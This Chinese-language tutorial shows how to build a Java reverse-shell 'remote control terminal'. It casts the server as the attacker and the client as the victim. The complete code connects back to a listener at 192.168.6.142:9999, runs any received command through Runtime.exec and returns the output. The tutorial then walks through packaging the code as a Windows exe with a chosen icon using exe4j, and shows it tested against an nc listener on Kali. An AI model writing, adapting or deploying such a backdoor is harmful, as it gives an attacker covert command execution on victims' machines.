基于Java制作一个简易的远控终端
更新时间:2023年04月04日 14:46:57 作者:T1ngSh0w
这篇文章主要为大家详细介绍了如何基于Java制作一个简易的远控终端,文中的示例代码讲解详细,具有一定的学习价值,感兴趣的可以了解一下
远控终端的本质
1、服务端(攻击者)传输消息 ----> socket连接 ----> 客户端(被攻击者)接收消息
2、客户端执行消息内容(即执行服务端传回来的命令)
3、客户端传输执行结果 ----> socket连接 ----> 服务端显示命令执行结果
Java制作简易的远控
1、环境
环境:IntelliJ IDEA 2022.1.1 + jdk1.8 + exe4j.exe
2、新建项目
打开idea,直接新建一个最普通的Java项目即可。
3、新建一个Java类
4、编写程序
(1)导入需要使用到的类包
import java.io.*; import java.net.Socket; import java.nio.charset.StandardCharsets;
(2)编写main方法
...
import java.nio.charset.StandardCharsets;
public class RemoteControl {
public static void main(String[] args) {
}
}
(3)建立socket连接
public static void main(String[] args) {
try {
// 建立socket连接
Socket socket = new Socket("192.168.6.142", 9999);
} catch (IOException e) {
e.printStackTrace();
}
}
(4)接收服务端传输的消息(即命令)
...
import java.nio.charset.StandardCharsets;
public class RemoteControl {
public static void main(String[] args) {
try {
// 建立socket连接
Socket socket = new Socket("192.168.6.142", 9999);
// 建立成功后while循环保持连接
while (true) {
// inputStream接收服务端传入的字节流数据
InputStream inputStream = socket.getInputStream();
// 定义客户端以一个字节大小的方式接收服务端传入的字节流数据
byte[] bytes = new byte[1];
// 服务端传入字节流数据转化成字符型数据——命令
String command = "";
while (true) {
// 判断服务端传入的字节流数据是否被bytes字节数组接收完
if (inputStream.available() > 0) {
// 将服务端传入的字节流数据以一个字节大小的方式读入bytes字节数组中
inputStream.read(bytes);
// 将读入的字节流数据转化成16进制数据
String hexString = BytesToHexString(bytes);
// 将16进制数据转化成字符型数据并赋值给command——命令
command += HexStringToString(hexString);
// 判断服务端传入的字节流数据是否读完,如果读完就执行命令,否则跳过以下流程继续循环读取服务端传入的字节流数据直到读完为止
if (inputStream.available() == 0) {
// 去掉服务端传回来命令的空格
command = command.trim();
// 如果传回来的命令为exit,就直接断开连接
if (command.equals("exit")) {
return;
}
}
}
}
}
}
...
}
}
其中需要将接收数据的字节流先转化为16进制数据,再将16进制数据转化为字符型数据,这里分别自定义了两个静态方法:BytesToHexString和HexStringToString。
两个方法的定义如下:
...
import java.nio.charset.StandardCharsets;
public class RemoteControl {
public static void main(String[] args) {
......
}
// 将字节流数据转化为16进制数据
public static String BytesToHexString(byte[] bytes) {
if (bytes == null) {
return null;
}
char[] hexArray = "0123456789ABCDEF".toCharArray();
char[] hexChars = new char[bytes.length * 2];
for (int i = 0; i < bytes.length; i++) {
int temp = bytes[i] & 0xFF;
hexChars[i * 2] = hexArray[temp >> 4];
hexChars[i * 2 + 1] = hexArray[temp & 0x0F];
}
return new String(hexChars);
}
// 将16进制数据转化为字符型数据
public static String HexStringToString(String hexString) {
byte[] array = new byte[hexString.length() / 2];
try {
for (int i = 0; i < array.length; i++) {
array[i] = (byte) (0xFF & Integer.parseInt(hexString.substring(i * 2, i * 2 + 2), 16));
}
hexString = new String(array, "UTF-8");
} catch (UnsupportedEncodingException e) {
e.printStackTrace();
return "";
}
return hexString;
}
(5)执行消息内容(即执行服务端传回来的命令)
...
import java.nio.charset.StandardCharsets;
public class RemoteControl {
public static void main(String[] args) {
try {
// 建立socket连接
Socket socket = new Socket("192.168.6.142", 9999);
// 建立成功后while循环保持连接
while (true) {
.......
while (true) {
// 判断服务端传入的字节流数据是否被bytes字节数组接收完
if (inputStream.available() > 0) {
......
// 判断服务端传入的字节流数据是否读完,如果读完就执行命令,否则跳过以下流程继续循环读取服务端传入的字节流数据直到读完为止
if (inputStream.available() == 0) {
......
}
// 执行命令并返回结果
try {
// 执行服务端传回来的命令,将命令的执行过程交给exec进程
Process exec = Runtime.getRuntime().exec(command);
} catch (Exception e) {
e.printStackTrace();
}
}
}
}
}
}
......
}
}
(6)将执行结果返回给服务端
...
import java.nio.charset.StandardCharsets;
public class RemoteControl {
public static void main(String[] args) {
try {
// 建立socket连接
Socket socket = new Socket("192.168.6.142", 9999);
// 建立成功后while循环保持连接
while (true) {
.......
while (true) {
// 判断服务端传入的字节流数据是否被bytes字节数组接收完
if (inputStream.available() > 0) {
......
// 判断服务端传入的字节流数据是否读完,如果读完就执行命令,否则跳过以下流程继续循环读取服务端传入的字节流数据直到读完为止
if (inputStream.available() == 0) {
......
}
// 执行命令并返回结果
try {
// 执行服务端传回来的命令,将命令的执行过程交给exec进程
Process exec = Runtime.getRuntime().exec(command);
// 将执行命令返回结果的流赋值给输入流results中
InputStream results = exec.getInputStream();
// 考虑到执行命令的返回结果可能会有中文字符,所以采用BufferedReader
BufferedReader reader = new BufferedReader(new InputStreamReader(results));
// 创建数据输出流,并将数据输出流中的数据流给到socket连接的输出流中,以让命令结果返回给服务端
DataOutputStream dataOutputStream = new DataOutputStream(socket.getOutputStream());
String line = null;
// 读取命令执行结果的一行数据,如果数据不为空,则将数据写入到数据输出流中,然后将数据输出流中的数据进行刷新
while ((line = reader.readLine()) != null) {
dataOutputStream.write((line + "\n").getBytes(StandardCharsets.UTF_8));
dataOutputStream.flush();
}
// 进程等待
exec.waitFor();
// 关闭输入流
results.close();
// 关闭读入流
reader.close();
// 销毁进程对象
exec.destroy();
break;
} catch (Exception e) {
e.printStackTrace();
} finally {
// 将存放命令的字符串置位空,防止下次执行命令的时候将该次命令也带入执行
command = "";
}
}
}
}
}
}
......
}
}
至此,Java编写远程控制终端完成!
(7)测试远控终端的可用性
打开一台kali虚拟机(IP为192.168.6.142)作为服务端,使用nc监听9999端口。
连接成功,远控终端制作完成!
5、将项目打包成jar包并生成exe文件
(1)打成jar包
步骤一
点击文件 --> 点击项目结构。
步骤二
点击工件 --> 点击JAR --> 点击来自具有…。
步骤三
将主类设为main函数所在的Java类 --> 点击确定。
步骤四
点击确定。
步骤五
点击构建 --> 点击构建项目
步骤六
再次点击构建 --> 点击构建工件
步骤七
点击构建即可。
步骤八
这时会在项目out\artifacts\remoteControl_jar目录下,生成了一个Jar文件。直接复制拖出来即可。
至此打包jar包完成。
(2)生成exe文件
使用exe4j(官网下载地址:https://exe4j.apponic.com/ )将jar包生成exe文件。
步骤一
打开exe4j --> next。
步骤二
选择"JAR in EXE"mode --> next
步骤三
填写相关内容 --> next。
步骤四
填写exe文件名字 --> 选择exe图标 --> 设置Advanced Options为32-bit or 64-bit。
步骤五
勾选选项 --> next。
步骤六
next。
步骤七
添加jar包 --> 选择jar包的存放路径 --> 选择jar包main函数所在的主类 --> next。
步骤八
选择jdk兼容最低的版本 --> 勾选"Allow JREs with a beta version number" --> next
步骤九
之后就一直next即可。
exe文件成功生成。
(3)测试exe文件的可用性
kali服务端监听端口。
点击运行生成的exe文件。
点击确定。
连接成功,Java制作远程控制终端完成!
附完整代码
import java.io.*;
import java.net.Socket;
import java.nio.charset.StandardCharsets;
public class RemoteControl {
public static void main(String[] args) {
try {
// 建立socket连接
Socket socket = new Socket("192.168.6.142", 9999);
// 建立成功后while循环保持连接
while (true) {
// inputStream接收服务端传入的字节流数据
InputStream inputStream = socket.getInputStream();
// 定义客户端以一个字节大小的方式接收服务端传入的字节流数据
byte[] bytes = new byte[1];
// 服务端传入字节流数据转化成字符型数据——命令
String command = "";
while (true) {
// 判断服务端传入的字节流数据是否被bytes字节数组接收完
if (inputStream.available() > 0) {
// 将服务端传入的字节流数据以一个字节大小的方式读入bytes字节数组中
inputStream.read(bytes);
// 将读入的字节流数据转化成16进制数据
String hexString = BytesToHexString(bytes);
// 将16进制数据转化成字符型数据并赋值给command——命令
command += HexStringToString(hexString);
// 判断服务端传入的字节流数据是否读完,如果读完就执行命令,否则跳过以下流程继续循环读取服务端传入的字节流数据直到读完为止
if (inputStream.available() == 0) {
// 去掉服务端传回来命令的空格
command = command.trim();
// 如果传回来的命令为exit,就直接断开连接
if (command.equals("exit")) {
return;
}
// 执行命令并返回结果
try {
// 执行服务端传回来的命令,将命令的执行过程交给exec进程
Process exec = Runtime.getRuntime().exec(command);
// 将执行命令返回结果的流赋值给输入流results中
InputStream results = exec.getInputStream();
// 考虑到执行命令的返回结果可能会有中文字符,所以采用BufferedReader
BufferedReader reader = new BufferedReader(new InputStreamReader(results));
// 创建数据输出流,并将数据输出流中的数据流给到socket连接的输出流中,以让命令结果返回给服务端
DataOutputStream dataOutputStream = new DataOutputStream(socket.getOutputStream());
String line = null;
// 读取命令执行结果的一行数据,如果数据不为空,则将数据写入到数据输出流中,然后将数据输出流中的数据进行刷新
while ((line = reader.readLine()) != null) {
dataOutputStream.write((line + "\n").getBytes(StandardCharsets.UTF_8));
dataOutputStream.flush();
}
// 进程等待
exec.waitFor();
// 关闭输入流
results.close();
// 关闭读入流
reader.close();
// 销毁进程对象
exec.destroy();
break;
} catch (Exception e) {
e.printStackTrace();
} finally {
// 将存放命令的字符串置位空,防止下次执行命令的时候将该次命令也带入执行
command = "";
}
}
}
}
}
} catch (IOException e) {
e.printStackTrace();
}
}
// 将字节流数据转化为16进制数据
public static String BytesToHexString(byte[] bytes) {
if (bytes == null) {
return null;
}
char[] hexArray = "0123456789ABCDEF".toCharArray();
char[] hexChars = new char[bytes.length * 2];
for (int i = 0; i < bytes.length; i++) {
int temp = bytes[i] & 0xFF;
hexChars[i * 2] = hexArray[temp >> 4];
hexChars[i * 2 + 1] = hexArray[temp & 0x0F];
}
return new String(hexChars);
}
// 将16进制数据转化为字符型数据
public static String HexStringToString(String hexString) {
byte[] array = new byte[hexString.length() / 2];
try {
for (int i = 0; i < array.length; i++) {
array[i] = (byte) (0xFF & Integer.parseInt(hexString.substring(i * 2, i * 2 + 2), 16));
}
hexString = new String(array, "UTF-8");
} catch (UnsupportedEncodingException e) {
e.printStackTrace();
return "";
}
return hexString;
}
}
以上就是基于Java制作一个简易的远控终端的详细内容,更多关于Java远控终端的资料请关注脚本之家其它相关文章!
相关文章
浅谈在Spring中如何使用数据源(DBCP、C3P0、JNDI)
这篇文章主要介绍了浅谈在Spring中如何使用数据源(DBCP、C3P0、JNDI),小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧2018-10-10
Java实现深度优先搜索(DFS)和广度优先搜索(BFS)算法
深度优先搜索(DFS)和广度优先搜索(BFS)是两种基本的图搜索算法,可用于图的遍历、路径搜索等问题。DFS采用栈结构实现,从起点开始往深处遍历,直到找到目标节点或遍历完整个图;BFS采用队列结构实现,从起点开始往广处遍历,直到找到目标节点或遍历完整个图2023-04-04
java中的length属性是针对数组说的,比如说你声明了一个数组,想知道这个数组的长度则用到了length这个属性。java中的length()方法是针对字符串String说的,如果想看这个字符串的长度则用到length()这个方法。这篇文章将介绍几个关于Java数组的关键概念。2016-11-11
这篇文章主要介绍了Java中indexOf()的用法小结,indexOf()有四种方法,用来查找某个字符或字符串的位置,本文通过示例代码给大家介绍的非常详细,需要的朋友可以参考下2024-01-01
解决SpringMvc后台接收json数据中文乱码问题的几种方法
本篇文章主要介绍了解决SpringMvc后台接收json数据中文乱码问题的几种方法,具有一定的参考价值,感兴趣的小伙伴们可以参考一下2018-01-01
这篇文章主要介绍了java不通过配置文件初始化logger示例,需要的朋友可以参考下2014-05-05
java类中生成jfreechart,返回图表的url地址 代码分享
这篇文章介绍了java类中生成jfreechart,返回图表的url地址的代码,有需要的朋友可以参考一下2013-08-08
在本篇文章里小编给大家整理的是一篇关于Java SPI 机制知识点总结内容,需要的朋友们可以参考下。2020-02-02
这篇文章主要介绍了java 实现双向链表实例详解的相关资料,需要的朋友可以参考下2017-03-03
这篇文章主要介绍了Java 中引入内部类的意义?文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,,需要的朋友可以参考下2019-06-06
最新评论